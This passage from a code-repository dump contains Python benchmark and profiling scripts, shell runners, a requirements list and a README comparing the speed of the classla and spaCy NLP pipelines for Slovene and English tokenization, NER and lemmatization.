n_sent, 'lemmas': n_lem, 'count': count}\n\n\ndef _lemmas(doc) -> list:\n build = []\n for sentence in doc.sentences:\n for token in sentence.tokens:\n for word in token.words:\n dict = word.to_dict()\n if dict['text'].lower() != dict['lemma']:\n build.append(word)\n return build\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_classla_lemmas_sl,\n 'classla_quick': bm_classla_lemmas_500_sl,\n 'classla_idl': bm_classla_identity_lemmas_sl,\n 'classla_idl_quick': bm_classla_identity_lemmas_500_sl,\n 'spacy': bm_spacy_lemmas_en, 'spacy_quick': bm_spacy_lemmas_500_en,\n 'spacy_trf': bm_spacy_lemmas_en_trf, 'spacy_quick_trf': bm_spacy_lemmas_500_en_trf}\n bm.run(\"lem\", benchmarks)\n"
},
{
"alpha_fraction": 0.7651515007019043,
"alphanum_fraction": 0.7651515007019043,
"avg_line_length": 28.44444465637207,
"blob_id": "0282771ba67a62aa284af43fba8c2763e8f84b31",
"content_id": "c71e100efb72d3dff0088c3493d98fa642f15a2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 264,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 9,
"path": "/scripts/bm_quick_trf.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_pos.py --bm classla_quick spacy_quick_trf\npython benchmarks/bm_ner.py --bm classla_quick spacy_quick_trf\npython benchmarks/bm_lem.py --bm classla_quick classla_idl_quick spacy_quick_trf"
},
{
"alpha_fraction": 0.5783664584159851,
"alphanum_fraction": 0.5827814340591431,
"avg_line_length": 16.423076629638672,
"blob_id": "d1754be0e01264777afb8e9a6645a21ae8cd7943",
"content_id": "151b002001411845c282e6e600eeffb787add3e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 453,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 26,
"path": "/scripts/profile_sent_classla.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nPROFILE_FILE=\"$PROFILE_DIR/tok-classla.pstat\"\n\npython benchmarks/bm_tok.py --bm classla --no-report --profile $PROFILE_FILE\n\necho \"... cProfile statistics generated at: $PROFILE_FILE\"\n\nwhile [[ $# -ne 0 ]]\ndo\n arg=\"$1\"\n case \"$arg\" in\n --interactive)\n snakeviz $PROFILE_FILE\n ;;\n *)\n ;;\n esac\n shift\ndone\n"
},
{
"alpha_fraction": 0.5601626038551331,
"alphanum_fraction": 0.5817072987556458,
"avg_line_length": 23.356435775756836,
"blob_id": "3b30b9d0a878f330a35055fe762c68a2d785d482",
"content_id": "cc70ec2f90391b7231a5bd20d91df3a8e768e40c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2460,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 101,
"path": "/benchmarks/bm_ner.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport spacy\nimport torch\nfrom thinc.backends import set_gpu_allocator\nfrom thinc.util import require_gpu\n\nimport bm\nimport classla\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_ner')\n\n\n@measure\ndef bm_classla_ner_sl():\n return _classla(data.sl_size())\n\n\n@measure\ndef bm_classla_ner_1000_sl():\n return _classla(1000)\n\n\n@measure\ndef bm_spacy_ner_en():\n return _spacy(data.en_size())\n\n\n@measure\ndef bm_spacy_ner_1000_en():\n return _spacy(1000)\n\n\n@measure\ndef bm_spacy_ner_1000_en_trf():\n return _spacy(1000, model=bm.TRF_SPACY_MODEL)\n\n\n@measure\ndef bm_spacy_ner_en_trf():\n return _spacy(data.en_size(), model=bm.TRF_SPACY_MODEL)\n\n\n#\n\ndef _spacy(limit: int, model: str = bm.DEFAULT_SPACY_MODEL, cpu: bool = False):\n if cpu or not torch.cuda.is_available():\n spacy.require_cpu()\n else:\n set_gpu_allocator(\"pytorch\")\n require_gpu(0)\n\n nlp = spacy.load(model, exclude=['lemmatizer'])\n n_sent = 0\n n_ne = 0\n count = 0\n for doc in nlp.pipe(data.en()):\n n_sent += sum(1 for _ in doc.sents)\n n_ne += sum(1 for _ in doc.ents)\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'ne': n_ne, 'count': count}\n\n\ndef _classla(limit: int, cpu: bool = False):\n nlp = classla.Pipeline(processors='tokenize,ner', dir=bm.CLASSLA_MODELS_DIR, lang='sl', use_gpu=not cpu)\n n_sent = 0\n n_ne = 0\n count = 0\n for line in data.sl():\n doc = nlp(line)\n sentences = doc.sentences\n n_sent += len(sentences)\n n_ne += len(_ne(doc))\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'ne': n_ne, 'count': count}\n\n\ndef _ne(doc) -> list:\n build = []\n for sentence in doc.sentences:\n for token in sentence.tokens:\n if token.ner != 'O':\n build.append(token)\n return build\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_classla_ner_sl, 'classla_quick': bm_classla_ner_1000_sl,\n 'spacy': bm_spacy_ner_en, 'spacy_quick': bm_spacy_ner_1000_en,\n 'spacy_trf': bm_spacy_ner_en_trf, 'spacy_quick_trf': bm_spacy_ner_1000_en_trf}\n bm.run(\"ner\", benchmarks)\n"
},
{
"alpha_fraction": 0.531862735748291,
"alphanum_fraction": 0.5441176295280457,
"avg_line_length": 24.5,
"blob_id": "66c3bab75e79634c567563ff0e55b289062ad3d4",
"content_id": "48fb5884f48bda585e649a561f510f6c486266e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1224,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 48,
"path": "/benchmarks/data.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "__EN_TEXT_FILE__ = 'data/text/raw-en.txt'\n__SL_TEXT_FILE__ = 'data/text/raw-slo.txt'\n\nfrom classla import Document\n\n\ndef sl_docs(batch_size=1):\n if batch_size == 1:\n yield [Document([], text=next(sl(batch_size)))]\n else:\n yield [Document([], text=d) for d in sl(batch_size)]\n\n\ndef sl(batch_size=1):\n yield from _generator(__SL_TEXT_FILE__, batch_size)\n\n\ndef en(batch_size=1):\n yield from _generator(__EN_TEXT_FILE__, batch_size)\n\n\ndef en_size() -> int:\n return sum(1 for _ in open(__EN_TEXT_FILE__, 'rb'))\n\n\ndef sl_size() -> int:\n return sum(1 for _ in open(__SL_TEXT_FILE__, 'rb'))\n\n\ndef _generator(file, batch_size):\n assert batch_size > 0\n\n # note: yields str (if batch_size is 1) or list[str] if batch_size gt 1\n with open(file, encoding='utf-8') as reader:\n assert batch_size >= 1\n\n if batch_size > 1:\n batch = []\n for line in reader:\n if batch_size == 1:\n yield line.rstrip()\n else:\n batch.append(line.rstrip())\n if len(batch) == batch_size:\n yield batch\n batch.clear()\n if batch_size > 1 and len(batch) > 0:\n yield batch\n"
},
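The generator contract in data.py is easy to misread: depending on `batch_size` it yields either a `str` or a `list[str]`, which is exactly the distinction the batched benchmark in bm_tok.py has to work around. A quick illustration (not repo code) of both modes:

```python
# batch_size == 1 (default) yields one paragraph as str per iteration;
# batch_size > 1 yields lists of up to batch_size paragraphs.
import data

line = next(data.sl())     # str
batch = next(data.sl(50))  # list[str], length <= 50
print(type(line), type(batch), len(batch))
```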
{
"alpha_fraction": 0.5555555820465088,
"alphanum_fraction": 0.5566264986991882,
"avg_line_length": 31.478260040283203,
"blob_id": "5c3e29afaa98f82c11eef1f3f2e7fdb428d32451",
"content_id": "0b4f9e718bddc63ef8dc0b7176693701e18adbcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3735,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 115,
"path": "/benchmarks/bm.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import argparse\nimport cProfile\nimport logging\nimport os\nfrom importlib.metadata import version\nfrom pathlib import Path\n\nimport time\nimport torch\n\nfrom measure import close_report\nfrom measure import open_report\n\n__VERSION__ = \"1.0.2\"\n\nLOG = logging.getLogger('bm')\n\nCLASSLA_MODELS_DIR = 'var/bm/models'\nDEFAULT_SPACY_MODEL = 'en_core_web_md'\nTRF_SPACY_MODEL = 'en_core_web_trf'\n\n\ndef run(name: str, benchmarks: dict):\n all_ = sorted(benchmarks.keys())\n\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n\n LOG.info(\"running benchmarks: {} - {}\".format(name, all_))\n\n if torch.cuda.is_available():\n LOG.info(\"... CUDA devices: {}\".format(torch.cuda.device_count()))\n LOG.info(\"... ... current: {}\".format(torch.cuda.current_device()))\n LOG.info(\"... ... name: {}\".format(torch.cuda.get_device_name(torch.cuda.current_device())))\n else:\n LOG.info(\"... CUDA not available\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--bm',\n nargs='+',\n help=\"benchmark: all or {} | default=all\".format(all_),\n default='all')\n parser.add_argument('--no-report', action='store_true', help='Don\\'t generate report at var/bm/reports.')\n parser.add_argument('--profile', default=None, help='Path where collected cProfile stats are generated'\n ' | default=None')\n parser.add_argument('--cpu', action='store_true', help='Disable CUDA.')\n parser.set_defaults(no_report=False)\n parser.set_defaults(cpu=False)\n args = parser.parse_args()\n\n LOG.info(\"... args: {}\".format(args))\n\n if args.cpu:\n accelerator = \"cpu[preferred]\"\n elif not torch.cuda.is_available():\n accelerator = \"cpu[no-cuda-available]\"\n else:\n accelerator = \"cuda[{}]\".format(torch.cuda.get_device_name(torch.cuda.current_device()))\n\n LOG.info(\"... engaged accelerator: {}\".format(accelerator))\n LOG.info(\"... classla version: {}\".format(version('classla')))\n LOG.info(\"... obeliks version: {}\".format(version('obeliks')))\n LOG.info(\"... torch version: {}\".format(version('torch')))\n\n if not args.no_report:\n tag = \"{}-{}\".format(name, _format_bm(args.bm))\n open_report(prefix=tag + \"-\", info={'tag': tag,\n 'bm-version': __VERSION__,\n 'classla-v': version('classla'),\n 'obeliks-v': version('obeliks'),\n 'torch-v': version('torch'),\n 'accelerator': accelerator})\n\n profile_file = args.profile\n\n pr = None\n if profile_file is not None:\n LOG.info(\"... running cProfile profiler!\")\n os.makedirs(Path(profile_file).parent, exist_ok=True)\n pr = cProfile.Profile()\n\n if isinstance(args.bm, list):\n bms = args.bm\n elif args.bm == 'all':\n bms = all_\n elif args.bm in benchmarks:\n bms = [args.bm]\n else:\n raise Exception(\"unknown benchmark: {}\".format(args.bm))\n\n for bm in bms:\n if pr is not None:\n pr.enable()\n benchmarks[bm]()\n if pr is not None:\n pr.disable()\n time.sleep(1)\n\n if pr is not None:\n LOG.info(\"see cProfile stats: {}\".format(profile_file))\n pr.dump_stats(profile_file)\n\n if not args.no_report:\n close_report()\n\n LOG.info(\"completed, bye bye!\")\n\n\ndef _format_bm(bm):\n if isinstance(bm, list):\n return '-'.join(bm)\n return bm\n"
},
{
"alpha_fraction": 0.7149028182029724,
"alphanum_fraction": 0.7213822603225708,
"avg_line_length": 23.36842155456543,
"blob_id": "4c62f02c68a25d4e972edf8d6b209245c26dcaf5",
"content_id": "ba66d919df4ebb97e11b40bd6e25a8ebd4f8abc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 19,
"path": "/scripts/setup.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nVAR_DIR=./var/bm\nmkdir -p $VAR_DIR\n\nMODELS_DIR=$VAR_DIR/models\nmkdir -p $MODELS_DIR\n\npython -m pip install -U pip setuptools wheel\npython -m pip install -U spacy[transformers,cuda112]\n\npython -m spacy download en_core_web_md\npython -m spacy download en_core_web_trf\n\npython -c \"import classla; classla.download(lang='sl', dir='${MODELS_DIR}', logging_level='info')\" || echo \"failed to download slo model\"\n"
},
{
"alpha_fraction": 0.6930692791938782,
"alphanum_fraction": 0.6930692791938782,
"avg_line_length": 13.428571701049805,
"blob_id": "9fe73232d204ebb704b939a3b7fff479b6214a6d",
"content_id": "6fe2a667bc20d422c83d1f0639b62abfab800ebe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/scripts/bm_ner_trf.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_ner.py --bm spacy_trf\n"
},
{
"alpha_fraction": 0.6086350679397583,
"alphanum_fraction": 0.6155988574028015,
"avg_line_length": 22.129032135009766,
"blob_id": "433a4539f5db6d1a4737a8c206efdd64b0e304ea",
"content_id": "1a5de3713607242a2cb547dba06943e3e488bc6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 718,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 31,
"path": "/scripts/profile_lem_classla_quick.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nNOW=$(date +\"%Y%m%d_%H%M%S\")\n\nPROFILE_FILE=\"${PROFILE_DIR}/${NOW}_lem-classla-q.pstat\"\nPROFILE_FILE_2=\"${PROFILE_DIR}/${NOW}_lem-classla_idl-q.pstat\"\n\npython benchmarks/bm_lem.py --bm classla_quick --no-report --profile \"$PROFILE_FILE\"\npython benchmarks/bm_lem.py --bm classla_idl_quick --no-report --profile \"$PROFILE_FILE_2\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_2\"\n\nwhile [[ $# -ne 0 ]]\ndo\n arg=\"$1\"\n case \"$arg\" in\n --interactive)\n snakeviz $PROFILE_FILE\n ;;\n *)\n ;;\n esac\n shift\ndone\n\n"
},
{
"alpha_fraction": 0.39411765336990356,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 13.166666984558105,
"blob_id": "ff9f8b8a3bac0582baa116112b56b84680a64320",
"content_id": "58a6db6b36e7ad62da873d5daea74d7d07ce1bd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "numpy~=1.20.3\ntorch~=1.8.1\nrequests~=2.25.1\nsix~=1.16.0\ntqdm~=4.61.0\nregex~=2021.4.4\nlxml~=4.6.3\npandas~=1.2.4\npsutil~=5.8.0\nsnakeviz~=2.1.0\npytest~=6.2.4\nclassla~=1.0.1\n"
},
{
"alpha_fraction": 0.7475076913833618,
"alphanum_fraction": 0.7788653373718262,
"avg_line_length": 37.83802795410156,
"blob_id": "49ad3ae691f4484855156c5b83be21d839e76495",
"content_id": "67ff2a65516e65c6fa8bd87c459ebdb8b3727dc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5517,
"license_type": "no_license",
"max_line_length": 355,
"num_lines": 142,
"path": "/README.md",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "# CLASSLA LAB\n\nHere is a lab environment focused on benchmarking & profiling `classla` NLP processors. The benchmarks based on `spacy`\ntechnology are also implemented for study and comparison. The idea behind this repository is to provide a reference\nenvironment where the performance of classla processors can be analyzed and perhaps optimized (in future phases). Only\ninference (prediction) pipelines are analyzed.\n\nThe resulting observations are discussed at the end of this doc.\n\n## Installation\n\n```bash\n\n# install project\ngit clone https://github.com/IgorTavcar/classla_lab\ncd classla_lab\npython3 -m venv env\nsource env/bin/activate\npython3 -m pip install -r requirements.txt \n\n```\n\n## Setup\n\nsh scripts/setup.sh\n\n## Data\n\nThe folder `data/text` contains two files `raw-en.txt` and `raw-slo.txt`. which are used as input in benchmark and\nprofile sessions. Each file contains text from a novel and two web articles with the same content in `sl` and `en`\nlanguages. The files are formatted in '1 paragraph per line' format, the lines are shuffled (to avoid copyright issues)\nand are not aligned.\n\n## Benchmarking\n\n```bash\n# quick benchmarks (short-lasting)\nsh scripts/bm_quick.sh\n\n# run all benchmarks \nsh scripts/bm_all.sh\n\n# classla (lstm) vs spacy (transformers) benchmarks\nsh scripts/bm_quick_trf.sh\nsh scripts/bm_all_trf.sh\n\n```\n\nClassla benchmarks are based on the `lstm` backbone (except for sentence tokenization which is based on `regex`). Spacy\nbenchmarks are based on the `tok2vec` backbone, `*_trf` benchmarks are based on the `transformers` backbone. Benchmark\nreports are at `var/bm/reports`.\n\n## Profiling\n\n```bash\n# method: cProfile\n# use option --interactive for interactive sessions (snakeviz) \n\n# run all profiles\nsh scripts/profile_all.sh\n\n# profile classla pipeline 'tokenize,pos,lemma'\nsh scripts/profile_lem_classla.sh\nsh scripts/profile_lem_classla_quick.sh\n\n# profile classla pipeline 'tokenize,lemma' + lemma-identity\nsh scripts/profile_lem_classla_idl_quick.sh\n\n# profile classla pipeline 'tokenize,ner'\nsh scripts/profile_ner_classla.sh\nsh scripts/profile_ner_classla_quick.sh\n\n# profile classla pipeline 'tokenize,pos'\nsh scripts/profile_pos_classla.sh\nsh scripts/profile_pos_classla_quick.sh\n\n# profile classla pipeline 'tokenize'\nsh scripts/profile_sent_classla.sh\n```\n\nResulted `*.pstat` files are at `var/bm/profiles`. For (browser based) interactive sessions use option `--interactive` (\nsee `snakeviz` doc).\n\n## Observations\n\n### Tokenization\n\nThe implementation of sentence tokenization in the module `obeliks` is suboptimal. A hotspot was discovered in\nthe `obeliks.rules.tokenize()` method. The function `load_rules()` is invoked twice for each `tokenize()` call. 
It would\nbe better if the rules are loaded and cached during the initialization phase of the processor.\n\n\n[tokenizer benchmarks (workstation)](results/reports/workstation_00/tok-all-20210619_131409.csv)\n\n[tokenizer benchmarks (laptoop)](results/reports/macbook_00/tok-all-20210619_060714.csv)\n\n#### Comments\n\n[bm_sentences_classla_obeliks_joined_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L24)\n\nThis benchmark shows the speed of the obeliks tokenizer that would be (approximately) achieved, if the hotspot problem\nwas fixed.\n\n[bm_sentences_classla_obeliks_batched_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L34)\n\nThis benchmark is based on the naive assumption that batching is supported by the classla pipeline. But - the tokenizer\nprocessor does not support list-of-strings input, so in this experiment the lines are joined by 'new-line' separators.\nThis approach does not improve the speed of processing ...\n\n[bm_sentences_classla_reldi_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L46)\n\nReldi tokenizer is much faster than obeliks. The difference in the number of sentences (between the two) is in the range of a few percent.\n\n[bm_sentences_classla_multi_docs_sl()](https://github.com/IgorTavcar/classla_lab/blob/1dfe45cfc4b8040a9df5ca971a50332431e288e8/benchmarks/bm_tok.py#L56)\n\nThis invocation will raise for classla versions <= 1.0.1.; multi-docs is a feature of stanza v1.2., but is not implemented in classla~=1.0.1..\n\n\n\n### Pipeline\n\nThe classla processor pipeline lacks:\n* streaming api:`Iterable[str] (YIELD)` - for a sequence of texts to process\n* `multiprocessing` support - for parallelizing text processing.\n* `multi-documents` support (stanza v1.2.) \n\n### POS, NER, LEMMA processors\n\nThese processors are based on the `LSTM` seq2seq architecture. The accuracy of these models is much better than that of statistical models, but even so, a **transformer** revolution currently rules the world (for so many ML tasks) ...\n\n\n#### Acceleration \n\nRNN acceleration is no joke. RNN computations involve intra/er/-state dependencies. These lead to poor hardware utilization and low performance. Compare *execution times* of `bm_classla_lemmas_sl()` and `bm_spacy_lemmas_en_trf()` in [lemmatization pipeline benchmarks](results/reports/workstation_00/lem-classla-classla_idl-spacy_trf-20210619_133953.csv).\n\n\nThe maximum GPU load was around 37% (for classla pipelines).\n\n## Discussion\n\n* introduction of `transformers` backbone\n* transfer of `classla` models to `spacy` and `huggingface` eco-systems\n\n\n"
},
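The README's central tokenization finding is that `obeliks.rules.tokenize()` pays for `load_rules()` twice per call. The generic repair is to parse the rules once and cache them. The sketch below is hypothetical: `load_rules()` and `tokenize()` here are stand-ins, not the actual obeliks API or rule format:

```python
# Hypothetical fix for the hotspot described above: cache the parsed rules
# so they are built once per process instead of on every tokenize() call.
from functools import lru_cache

@lru_cache(maxsize=1)
def load_rules():
    # stand-in for the expensive rule parsing obeliks performs
    return {"sentence_end": ".!?", "abbreviations": {"npr.", "dr."}}

def tokenize(text):
    rules = load_rules()  # cache hit on every call after the first
    return [tok for tok in text.split() if tok not in rules["abbreviations"]]
```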
{
"alpha_fraction": 0.780075192451477,
"alphanum_fraction": 0.780075192451477,
"avg_line_length": 27.052631378173828,
"blob_id": "82aaccaa5cfaf374cbd3004b01e5d00bef3bd46f",
"content_id": "6c01d2d788c8c8faceb595aa0b71794895d70d53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 19,
"path": "/scripts/bm_all.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_tok.py\n\npython benchmarks/bm_pos.py --bm classla_quick spacy_quick\npython benchmarks/bm_ner.py --bm classla_quick spacy_quick\npython benchmarks/bm_lem.py --bm classla_quick classla_idl_quick spacy_quick\n\npython benchmarks/bm_pos.py\npython benchmarks/bm_ner.py\npython benchmarks/bm_lem.py\n\npython benchmarks/bm_pos.py --bm classla spacy_trf\npython benchmarks/bm_ner.py --bm classla spacy_trf\npython benchmarks/bm_lem.py --bm classla classla_idl spacy_trf"
},
{
"alpha_fraction": 0.7200193405151367,
"alphanum_fraction": 0.7200193405151367,
"avg_line_length": 44.9555549621582,
"blob_id": "08b3a3d6f2768da1fe0266d525640a55cec4b617",
"content_id": "92677dbb2b093bd9fb9f2fe47125dd45e2487488",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2068,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 45,
"path": "/scripts/profile_all.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nNOW=$(date +\"%Y%m%d_%H%M%S\")\n\nPROFILE_FILE_TOK=\"${PROFILE_DIR}/${NOW}_tok-classla.pstat\"\n\nPROFILE_FILE_POS_Q=\"${PROFILE_DIR}/${NOW}_pos-classla-q.pstat\"\nPROFILE_FILE_NER_Q=\"${PROFILE_DIR}/${NOW}_ner-classla-q.pstat\"\nPROFILE_FILE_LEM_Q=\"${PROFILE_DIR}/${NOW}_lem-classla-q.pstat\"\nPROFILE_FILE_LEM_IDL_Q=\"${PROFILE_DIR}/${NOW}_lem-classla_idl-q.pstat\"\n\nPROFILE_FILE_POS=\"${PROFILE_DIR}/${NOW}_pos-classla.pstat\"\nPROFILE_FILE_NER=\"${PROFILE_DIR}/${NOW}_ner-classla.pstat\"\nPROFILE_FILE_LEM=\"${PROFILE_DIR}/${NOW}_lem-classla.pstat\"\nPROFILE_FILE_LEM_IDL=\"${PROFILE_DIR}/${NOW}_lem-classla_idl.pstat\"\n\npython benchmarks/bm_tok.py --bm classla --no-report --profile \"$PROFILE_FILE_TOK\"\n\npython benchmarks/bm_pos.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_POS_Q\"\npython benchmarks/bm_ner.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_NER_Q\"\npython benchmarks/bm_lem.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_LEM_Q\"\npython benchmarks/bm_lem.py --bm classla_idl_quick --no-report --profile \"$PROFILE_FILE_LEM_IDL_Q\"\n\npython benchmarks/bm_pos.py --bm classla --no-report --profile \"$PROFILE_FILE_POS\"\npython benchmarks/bm_ner.py --bm classla --no-report --profile \"$PROFILE_FILE_NER\"\npython benchmarks/bm_lem.py --bm classla --no-report --profile \"$PROFILE_FILE_LEM\"\npython benchmarks/bm_lem.py --bm classla_idl --no-report --profile \"$PROFILE_FILE_LEM_IDL\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_TOK\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_POS_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_NER_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_IDL_Q\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_POS\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_NER\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_IDL\"\n"
},
{
"alpha_fraction": 0.6245277523994446,
"alphanum_fraction": 0.6320837140083313,
"avg_line_length": 31.77142906188965,
"blob_id": "461733e672e89eea4ff8f5086172c017ad4c9774",
"content_id": "0daafdc330ce3fa9ed3c4bf2573d80a36db53d44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3441,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 105,
"path": "/benchmarks/bm_tok.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport classla\nimport spacy\n\nimport bm\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_tok')\n\n\n@measure\ndef bm_sentences_classla_obeliks_sl():\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n n = 0\n for line in data.sl():\n doc = nlp(line)\n n += len(doc.sentences)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_classla_obeliks_joined_sl():\n # This benchmark shows the speed of the obeliks tokenizer that would be (approximately) achieved\n # ... if the hotspot problem was fixed.\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n str = \" \".join(data.sl())\n doc = nlp(str)\n return {'sentences': len(doc.sentences)}\n\n\n@measure\ndef bm_sentences_classla_obeliks_batched_sl():\n # This benchmark is based on naive assumption that batching of input samples is supported.\n # Splitting the samples in lines does not improve the performance of the pipeline.\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n n = 0\n for batch in data.sl(50):\n doc = nlp('\\n'.join(batch)) # lists are not supported\n n += len(doc.sentences)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_classla_reldi_sl():\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, tokenize_library='reldi', lang='sl')\n n = 0\n for line in data.sl():\n doc = nlp(line)\n n += len(doc.sentences)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_classla_multi_docs_sl():\n # This invocation will raise for classla versions <= 1.0.1.\n # ... Multi-docs is a feature of stanza v1.2., but is not implemented in classla~=1.0.1.\n nlp = classla.Pipeline(processors='tokenize', dir=bm.CLASSLA_MODELS_DIR, lang='sl')\n n = 0\n for docs in data.sl_docs(64):\n result = nlp(docs)\n n += sum(len(doc.sentences) for doc in result)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_spacy_3cpu_en():\n nlp = spacy.load(bm.DEFAULT_SPACY_MODEL, exclude=['ner', 'attribute_ruler', 'lemmatizer'])\n n = 0\n for doc in nlp.pipe(data.en(), n_process=3):\n n += sum(1 for _ in doc.sents)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_spacy_en():\n nlp = spacy.load(bm.DEFAULT_SPACY_MODEL, exclude=['ner', 'attribute_ruler', 'lemmatizer'])\n n = 0\n for doc in nlp.pipe(data.en()):\n n += sum(1 for _ in doc.sents)\n return {'sentences': n}\n\n\n@measure\ndef bm_sentences_spacy_fast_en():\n nlp = spacy.load(bm.DEFAULT_SPACY_MODEL,\n exclude=[\"tok2vec\", \"tagger\", \"parser\", \"attribute_ruler\", \"lemmatizer\", \"ner\"])\n nlp.add_pipe('sentencizer')\n n = 0\n for doc in nlp.pipe(data.en()):\n n += sum(1 for _ in doc.sents)\n return {'sentences': n}\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_sentences_classla_obeliks_sl,\n 'classla_reldi': bm_sentences_classla_reldi_sl,\n 'classla_joined': bm_sentences_classla_obeliks_joined_sl,\n 'classla_batched': bm_sentences_classla_obeliks_batched_sl,\n 'classla_multi_docs': bm_sentences_classla_multi_docs_sl,\n 'spacy': bm_sentences_spacy_en,\n 'spacy_parallel': bm_sentences_spacy_3cpu_en,\n 'spacy_fast': 